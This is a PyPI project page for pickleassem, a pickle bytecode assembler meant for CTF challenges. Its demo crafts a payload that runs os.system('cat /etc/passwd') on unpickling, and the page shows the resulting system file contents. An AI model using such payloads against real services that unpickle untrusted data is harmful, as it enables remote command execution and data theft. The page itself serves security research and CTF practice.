Skip to main content

A simple pickle assembler to make handcrafting pickle bytecode easier.

Project description

pickleassem

PyPI - Downloads PyPI - Version PyPI - Python Version

GitHub Actions - Status Codecov - Coverage

A simple pickle assembler to make handcrafting pickle bytecode easier.

This is useful for CTF challenges like pyshv in Balsn CTF 2019.

Demo

import pickle
import pickletools

from pickleassem import PickleAssembler

pa = PickleAssembler(proto=4)
pa.push_mark()
pa.util_push('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()
assert b'R' not in payload
print(payload)
pickletools.dis(payload, annotate=1)
pickle.loads(payload)

Output:

b'\x80\x04(\x8c\x0fcat /etc/passwdios\nsystem\n.'
    0: \x80 PROTO      4 Protocol version indicator.
    2: (    MARK         Push markobject onto the stack.
    3: \x8c     SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.
   20: i        INST       'os system' (MARK at 2) Build a class instance.
   31: .    STOP                                   Stop the unpickling machine.
highest protocol among opcodes = 4
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...

Installation

Install with pip: pip install -U pickleassem

Documentation

Just refer to the source code. Each method of PickleAssembler whose name begins with push, build, pop or memo corresponds to a pickle opcode. Methods whose name begins with util are higher-level utility functions. append_raw can be used to insert arbitrary raw opcode.

The following opcodes and corresponding features are not implemented: PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, READONLY_BUFFER.

See Also

Other tools for pickle exploit:

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Files for pickleassem, version 1.1.0
Filename, size File type Python version Upload date Hashes
Filename, size pickleassem-1.1.0-py3-none-any.whl (9.7 kB) File type Wheel Python version py3 Upload date Hashes View
Filename, size pickleassem-1.1.0.tar.gz (10.1 kB) File type Source Python version None Upload date Hashes View

Supported by

AWS AWS Cloud computing Datadog Datadog Monitoring DigiCert DigiCert EV certificate Facebook / Instagram Facebook / Instagram PSF Sponsor Fastly Fastly CDN Google Google Object Storage and Download Analytics Pingdom Pingdom Monitoring Salesforce Salesforce PSF Sponsor Sentry Sentry Error logging StatusPage StatusPage Status page